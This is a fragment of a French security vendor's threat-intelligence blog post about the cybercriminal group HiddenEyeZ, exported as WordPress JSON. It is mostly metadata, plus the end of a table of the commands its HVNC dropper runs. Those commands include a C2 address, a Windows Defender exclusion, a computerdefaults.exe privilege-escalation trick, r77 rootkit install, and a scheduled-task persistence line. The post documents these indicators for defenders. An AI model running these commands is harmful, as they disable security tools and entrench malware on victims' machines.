rowspan=\"1\" colspan=\"1\" class=\"td_class_24939470\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_24939470\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">cvtres.exe HiddenEyeZ_Client 5.75.162.221 8081 mPgxExkLE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_49796436\" rowspan=\"1\" colspan=\"1\" class=\"td_class_49796436\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_49796436\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper <\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2977470\" class=\"desktop-view tr_class_2977470 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_96838955\" rowspan=\"1\" colspan=\"1\" class=\"td_class_96838955\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_96838955\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">cmd \/k start \/b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_31018877\" rowspan=\"1\" colspan=\"1\" class=\"td_class_31018877\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_31018877\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC Dropper <\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5227973\" class=\"desktop-view tr_class_5227973 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_86812026\" rowspan=\"1\" colspan=\"1\" class=\"td_class_86812026\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_86812026\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">cmd.exe \/c start computerdefaults.exe<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_28058369\" rowspan=\"1\" colspan=\"1\" class=\"td_class_28058369\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_28058369\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Dropper from HiddenEyeZ HVNC , Install\/uninstall r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6861553\" class=\"desktop-view tr_class_6861553 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_50797524\" rowspan=\"1\" colspan=\"1\" class=\"td_class_50797524\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_50797524\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">cmd \/c schtasks \/create \/f \/sc onlogon \/rl highest \/tn \"proclog\"\" \/tr [...]<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_76463197\" rowspan=\"1\" colspan=\"1\" class=\"td_class_76463197\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_76463197\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_column_text]Au cours de la r\u00e9cente analyse d&rsquo;une campagne de distribution de stealers RedLine, l&rsquo;\u00e9quipe de Cyber Threat Intelligence de Stormshield (Stormshield Customer Security Lab, SCSL) a mis la main sur des samples de malwares provenant d&rsquo;un groupe cyber-criminel,&#8230;<\/p>\n","protected":false},"author":83,"featured_media":414031,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[7065],"tags":[4368],"business_size":[],"industry":[],"help_mefind":[],"features":[],"type_security":[],"maintenance":[],"offer":[],"administration_tools":[],"cloud_offers":[],"listing_product":[],"class_list":["post-414036","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technical-posts-fr","tag-la-cybersecurite-par-stormshield"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>HiddenEyeZ : carte d\u2019identit\u00e9 du groupe cybercriminel | Stormshield<\/title>\n<meta name=\"description\" content=\"Apr\u00e8s l\u2019analyse sur la campagne RedLine, compl\u00e9ment d\u2019enqu\u00eate sur la cybercriminalit\u00e9 et le groupe HiddenEyeZ.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"HiddenEyeZ : carte d\u2019identit\u00e9 du groupe cybercriminel | Stormshield\" \/>\n<meta property=\"og:description\" content=\"Apr\u00e8s l\u2019analyse sur la campagne RedLine, compl\u00e9ment d\u2019enqu\u00eate sur la cybercriminalit\u00e9 et le groupe HiddenEyeZ.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\" \/>\n<meta property=\"og:site_name\" content=\"Stormshield\" \/>\n<meta property=\"article:published_time\" content=\"2023-05-25T14:00:23+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-01-30T14:43:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"1000\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Stormshield Customer Security Lab\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:site\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Stormshield Customer Security Lab\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"31 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\"},\"author\":{\"name\":\"Stormshield Customer Security Lab\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249\"},\"headline\":\"Groupe cybercriminel HiddenEyeZ : carte d\u2019identit\u00e9\",\"datePublished\":\"2023-05-25T14:00:23+00:00\",\"dateModified\":\"2024-01-30T14:43:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\"},\"wordCount\":9897,\"commentCount\":0,\"image\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\",\"keywords\":[\"La cybers\u00e9curit\u00e9 - par Stormshield\"],\"articleSection\":[\"Billets techniques\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\",\"url\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\",\"name\":\"HiddenEyeZ : carte d\u2019identit\u00e9 du groupe cybercriminel | Stormshield\",\"isPartOf\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\",\"datePublished\":\"2023-05-25T14:00:23+00:00\",\"dateModified\":\"2024-01-30T14:43:04+00:00\",\"author\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249\"},\"description\":\"Apr\u00e8s l\u2019analyse sur la campagne RedLine, compl\u00e9ment d\u2019enqu\u00eate sur la cybercriminalit\u00e9 et le groupe HiddenEyeZ.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage\",\"url\":\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\",\"contentUrl\":\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg\",\"width\":1000,\"height\":1000},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.stormshield.com\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Groupe cybercriminel HiddenEyeZ : carte d\u2019identit\u00e9\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/#website\",\"url\":\"https:\/\/www.stormshield.com\/fr\/\",\"name\":\"Stormshield\",\"description\":\"Stormshield\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.stormshield.com\/fr\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249\",\"name\":\"Stormshield Customer Security Lab\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g\",\"caption\":\"Stormshield Customer Security Lab\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"HiddenEyeZ : carte d\u2019identit\u00e9 du groupe cybercriminel | Stormshield","description":"Apr\u00e8s l\u2019analyse sur la campagne RedLine, compl\u00e9ment d\u2019enqu\u00eate sur la cybercriminalit\u00e9 et le groupe HiddenEyeZ.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/","og_locale":"fr_FR","og_type":"article","og_title":"HiddenEyeZ : carte d\u2019identit\u00e9 du groupe cybercriminel | Stormshield","og_description":"Apr\u00e8s l\u2019analyse sur la campagne RedLine, compl\u00e9ment d\u2019enqu\u00eate sur la cybercriminalit\u00e9 et le groupe HiddenEyeZ.","og_url":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/","og_site_name":"Stormshield","article_published_time":"2023-05-25T14:00:23+00:00","article_modified_time":"2024-01-30T14:43:04+00:00","og_image":[{"width":1000,"height":1000,"url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg","type":"image\/jpeg"}],"author":"Stormshield Customer Security Lab","twitter_card":"summary_large_image","twitter_creator":"@Stormshield","twitter_site":"@Stormshield","twitter_misc":{"\u00c9crit par":"Stormshield Customer Security Lab","Dur\u00e9e de lecture estim\u00e9e":"31 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#article","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/"},"author":{"name":"Stormshield Customer Security Lab","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249"},"headline":"Groupe cybercriminel HiddenEyeZ : carte d\u2019identit\u00e9","datePublished":"2023-05-25T14:00:23+00:00","dateModified":"2024-01-30T14:43:04+00:00","mainEntityOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/"},"wordCount":9897,"commentCount":0,"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg","keywords":["La cybers\u00e9curit\u00e9 - par Stormshield"],"articleSection":["Billets techniques"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/","url":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/","name":"HiddenEyeZ : carte d\u2019identit\u00e9 du groupe cybercriminel | Stormshield","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage"},"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg","datePublished":"2023-05-25T14:00:23+00:00","dateModified":"2024-01-30T14:43:04+00:00","author":{"@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249"},"description":"Apr\u00e8s l\u2019analyse sur la campagne RedLine, compl\u00e9ment d\u2019enqu\u00eate sur la cybercriminalit\u00e9 et le groupe HiddenEyeZ.","breadcrumb":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#primaryimage","url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg","contentUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2119247681.jpg","width":1000,"height":1000},{"@type":"BreadcrumbList","@id":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.stormshield.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Groupe cybercriminel HiddenEyeZ : carte d\u2019identit\u00e9"}]},{"@type":"WebSite","@id":"https:\/\/www.stormshield.com\/fr\/#website","url":"https:\/\/www.stormshield.com\/fr\/","name":"Stormshield","description":"Stormshield","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.stormshield.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/a05f467cec789f90c8a355b178743249","name":"Stormshield Customer Security Lab","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/46b9416c400398c1a9fc878c7a35bd2ae4f79caeeda138facd5cb65a4ab91c5d?s=96&d=mm&r=g","caption":"Stormshield Customer Security Lab"}}]}},"_links":{"self":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/414036","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/users\/83"}],"replies":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/comments?post=414036"}],"version-history":[{"count":25,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/414036\/revisions"}],"predecessor-version":[{"id":418171,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/414036\/revisions\/418171"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media\/414031"}],"wp:attachment":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media?parent=414036"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/categories?post=414036"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/tags?post=414036"},{"taxonomy":"business_size","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/business_size?post=414036"},{"taxonomy":"industry","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/industry?post=414036"},{"taxonomy":"help_mefind","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/help_mefind?post=414036"},{"taxonomy":"features","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/features?post=414036"},{"taxonomy":"type_security","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/type_security?post=414036"},{"taxonomy":"maintenance","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/maintenance?post=414036"},{"taxonomy":"offer","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/offer?post=414036"},{"taxonomy":"administration_tools","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/administration_tools?post=414036"},{"taxonomy":"cloud_offers","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/cloud_offers?post=414036"},{"taxonomy":"listing_product","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/listing_product?post=414036"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}